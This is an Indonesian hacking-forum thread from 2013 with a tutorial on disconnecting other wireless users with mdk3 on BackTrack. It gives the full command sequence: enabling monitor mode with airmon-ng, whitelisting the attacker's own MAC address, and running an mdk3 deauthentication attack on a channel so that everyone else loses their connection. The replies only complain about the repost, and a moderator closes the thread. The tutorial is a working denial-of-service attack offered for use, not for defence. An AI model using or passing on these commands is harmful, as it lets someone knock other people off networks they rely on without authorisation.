Thread Closed
Cara Disconnect Pengguna Wireless Menggunakan mdk3
Pada kali ini saya akan membahas bagaimana cara disconnect pengguna wireless menggunakan mdk3.

1. Buka terminal Backtrack anda lalu masukan perintah
root@bt:~# ifconfig wlan0 up

2. Setelah memasukan perintah ifconfig wlan0 up lalu masukan perintah

root@bt:~# airmon-ng start wlan0

3. Setelah itu anda buat file whitelist.txt. Pembuatan file whitelist.txt ini bertujuan agar anda tidak disconnect. Ibarat kata hanya anda yang online menggunakan wireless tersebut. Cara membuat file whitelist.txt yaitu dengan memasukan perintah.

root@bt:~# echo mac_address_anda > whitelist.txt

4. Setelah file whitelist.txt dibuat, saatnya kita beraksi Wink. Masukan perintah ini di terminal backtrack broagan.

root@bt:~# mdk3 mon0 d -c channel_wireless -w whitelist.txt

Setelah anda memasukan perintah root@bt:~# mdk3 mon0 d -c channel_wireless -w whitelist.txt maka otomatis semua pengguna wireless yang lagi konek putus Smile Kecuali punya agan :d Karena mac address brosudah ada di daftar whitelist.txt Smile. Oke sekian semoga bermanfaat.
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

Maaf om, ini tutorialnya repost dimari...
search dulu ya biar kagak repost...
Quote:~ Tan Hana Wighna Tan Sirna ~

Iya kakak, ini repost. Sebelum posting search dulu biar kagak repost.
Keep share ya bro Big Grin
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

Sory ya kalo repost, saya member baru om
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

(06-28-2013, 02:34 PM)dharaninja Wrote: Sory ya kalo repost, saya member baru om

Nggak apa2 om Smile tapi makasih udah mau share dimari buat temen2 Smile hehehehe...
keep spirit ya Smile
Quote:~ Tan Hana Wighna Tan Sirna ~

baca rule ny lgi Smile
any way thanks for the thread

untuk penangkallnya apa ada

CLOSED .. bagi member yang meneukan repost/dopost tolong report ke admin / momod ya .. makasih

Thread Closed